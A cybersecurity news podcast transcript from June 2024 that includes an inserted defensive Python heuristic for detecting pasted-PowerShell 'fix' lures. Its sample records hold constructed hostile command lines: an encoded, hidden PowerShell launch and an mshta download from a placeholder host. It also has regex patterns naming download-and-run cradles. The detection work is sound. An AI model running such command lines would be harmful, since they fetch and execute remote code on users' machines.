U.S. to ban the sale of Kaspersky products to consumers and businesses.
Welcome to Cyber Security Today. It’s Friday June 21st, 2024. I’m Howard Solomon, contributing reporter on cybersecurity for TechNewsday.com.
Several countries including the U.S. and Canada have forbidden government departments from using Kaspersky cybersecurity products because the company is headquartered in Russia. On Thursday the U.S. went one step further. It said Kaspersky won’t be able to sell new licences to American residents and businesses starting July 20th or deliver updates starting Sept. 29th. Reuters quoted Commerce Secretary Gina Raimondo saying Russia’s influence over the company is a significant risk to the U.S. Kaspersky says it has no ties to the Russian government.
Gullible employees are cutting and pasting malware into their organization’s IT systems. That’s according to researchers at Proofpoint. The tactic created by a threat actor works like this: Employees get a popup text box on their screens saying an error has occurred when they try to open an email attachment or a web page. The popup tells them to hit a button to copy and paste a script into a PowerShell terminal or a Windows Run dialog box. The instruction may say the code is a new root certificate, or just a software fix. Unknown to the employee, the script triggers malware. One way this attack is delivered is by employees falling for fake browser updates that compromise their browsers. This tactic can be blunted by regularly reminding employees not to follow instructions in popup boxes. Staff must also be reminded to follow only the approved way to update any software, including browsers.
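A defender's view of the paste-into-PowerShell lure described above: the pasted one-liner ends up as an interpreter process launched from the Run dialog (explorer.exe) or a browser, usually with a hidden window, an execution-policy bypass, a base64-encoded command or a download cradle. The Python below is an added example, not code from Proofpoint or from this report; it runs a simple heuristic over a handful of constructed Sysmon-style process-creation records (parent image, image, command line separated by `|`), and the lure command lines in it are made up for the example.

```python
"""Flag interpreter launches that look like a pasted 'fix' script.

Heuristic: parent is explorer.exe (the Run dialog) or a browser, the child is
PowerShell/cmd/mshta, and the command line carries a trait typical of pasted
one-liners. A plain scripted launch from explorer is NOT flagged, so the third
sample record below stays quiet.
"""
import re
from dataclasses import dataclass

# Constructed sample records (not real telemetry): parent_image|image|command_line
SAMPLE_EVENTS = [
    "C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|powershell -w hidden -ep bypass -enc QQBBAEEAQQBBAEEAQQBBAEEAQQA=",
    "C:\\Program Files\\Google\\Chrome\\chrome.exe|C:\\Windows\\System32\\cmd.exe"
    "|cmd /c mshta https://example.invalid/fix.hta",
    "C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|powershell -NoProfile -File C:\\Scripts\\backup.ps1",
    "C:\\Windows\\System32\\services.exe|C:\\Windows\\System32\\svchost.exe"
    "|svchost.exe -k netsvcs",
]

# Parents a user-driven paste would come from, and the interpreters it would start.
LURE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line traits, each named so the finding explains itself.
TRAITS = {
    "hidden window": re.compile(r"-(?:w|windowstyle)\s+hidden", re.I),
    "execution policy bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "encoded command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download-and-run cradle": re.compile(
        r"\b(?:iex|invoke-expression|downloadstring|invoke-webrequest|mshta)\b", re.I),
}


@dataclass
class Finding:
    parent: str
    image: str
    reasons: list


def basename(path: str) -> str:
    """Last path component, lower-cased, so image paths compare by file name."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_event(line: str):
    """Split one constructed record into (parent_image, image, command_line)."""
    parent, image, cmdline = line.split("|", 2)
    return parent, image, cmdline


def analyze(line: str):
    """Return a Finding when parent, child and command line all fit the lure."""
    parent, image, cmdline = parse_event(line)
    if basename(parent) not in LURE_PARENTS or basename(image) not in INTERPRETERS:
        return None
    reasons = [name for name, rx in TRAITS.items() if rx.search(cmdline)]
    return Finding(basename(parent), basename(image), reasons) if reasons else None


def scan(lines):
    """Run the heuristic over many records and keep only the hits."""
    return [f for f in (analyze(line) for line in lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"{finding.parent} -> {finding.image}: {', '.join(finding.reasons)}")
```

The parent-process condition is what keeps this from drowning in noise: scheduled tasks and management agents also launch PowerShell with encoded commands, but they do so from services, not from a user's shell or browser.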
E-commerce sites using Adobe Commerce or Magento appear to be slow patching a critical vulnerability. That’s according to researchers at Sansec. They report that seven days after Adobe issued a patch only 25 per cent of online sites it checked had installed the update. One reason the number is so low: The fix may break the website’s customer checkout function. Sansec says that if an IT administrator can’t upgrade their platform at the very least make sure any Linux servers running Adobe Commerce or Magento are patched. There is also a string that can be added to the website code that will help.
Organizations that allow employees to create reports using Microsoft’s Power BI are being warned of a potential vulnerability. Power BI is a data visualization tool for creating and publishing reports. But researchers at Nokod Security say the underlying raw corporate or personal data can be accessed in Power BI reports. Depending on the organization’s security risk model, that may be okay for internally published reports. But it’s not if the report can be accessed by anyone over the internet. Nokod Security says that a simple internet search string found over 160,000 Power BI reports that are open to the web. Microsoft told the researchers the ability to access raw data is a product feature. That means it’s up to organizations to make sure reports created with Power BI are protected.
Desktop administrators with PCs running Intel Core processors should be watching for firmware updates from the computers’ manufacturers. Researchers at Eclypsium say there’s a serious vulnerability in the PCs that use the Phoenix SecureCore UEFI firmware. The vulnerability allows a local attacker to escalate access privileges. In other words, it’s a firmware backdoor. Last month Lenovo published BIOS updates for affected computers and other manufacturers will likely follow. Other firmware backdoors that security pros may be familiar with are BlackLotus, CosmicStrand and MosaicRegressor. Those who build their own computers with Intel Core processors and motherboards with Phoenix firmware should investigate their options.
Finally, a new background report on RansomHub has been released for defenders. This is a new ransomware-as-a-service platform offered to crooks. According to researchers at Recorded Future, the gang behind this service has created versions that can exploit Windows, Linux and VMware ESXi servers. To attract affiliates to use their platform, RansomHub promises to give them 90 per cent of any funds victim organizations pay to get their data back.
Late tonight the Week in Review edition of the podcast will be available. Guest commentator David Shipley of Beauceron Security and I will discuss the hack of an organization that went undetected for perhaps three years, more detail on Snowflake attacks and allegations by Australia’s privacy commissioner into what caused a huge data breach of a medical insurance provider.
Follow Cyber Security Today on Apple Podcasts, Spotify or add us to your Flash Briefing on your smart speaker.